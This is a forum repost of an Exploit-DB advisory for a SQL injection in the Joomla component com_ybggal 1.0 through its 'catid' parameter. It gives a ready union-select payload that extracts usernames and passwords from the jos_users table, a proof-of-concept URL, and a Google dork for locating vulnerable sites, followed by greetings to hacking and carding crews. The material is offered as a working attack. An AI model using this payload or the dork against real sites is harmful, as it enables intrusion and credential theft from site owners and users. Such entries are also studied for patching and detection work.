Exploit Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13979
Проверка EDB
  1. Пройдено
Автор
V3N0M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-06-22
Код:
-----------------------------------------------------------------------
  Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: June, 22-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : YBG Gallery
Vendor      : http://www.yusufbottiegaos.com/
Version     : 1.0 Lower versions may also be affected
Google Dork : inurl:com_ybggal
----------------------------------------------------------------

Exploitz:
~~~~~~~
9999+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_ybggal&Itemid=[xxx]&catid=[SQLi]

*[xxx] = Valid itemid
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- JosS [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
---------------------------[EOF]--------------------------------
 
Источник
www.exploit-db.com

Похожие темы